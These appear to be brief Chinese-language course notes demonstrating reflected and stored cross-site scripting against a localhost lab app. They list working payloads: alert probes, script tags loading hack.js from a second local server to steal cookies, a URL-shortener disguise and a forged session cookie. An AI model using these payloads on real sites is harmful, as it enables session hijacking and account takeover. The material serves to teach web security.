反射型 - url参数直接注入
// 普通<br>http://localhost:3000/?from=china
// alert尝试<br>http://localhost:3000/?from=<script>alert(3)</script><br>
// 获取Cookie<br>http://localhost:3000/?from=<script src="http://localhost:4000/hack.js"> </script><br>
// 短域名伪造<br>https://dwz.cn/
// 伪造cookie入侵 chrome<br>document.cookie="kaikeba:sess=eyJ1c2VybmFtZSI6Imxhb3dhbmciL"<br>
存储型 - 存储到DB后读取时注入
// 评论<br><script>alert(1)</script>
// 跨站脚本注入<br>我来了<script src="http://localhost:4000/hack.js"></script><br>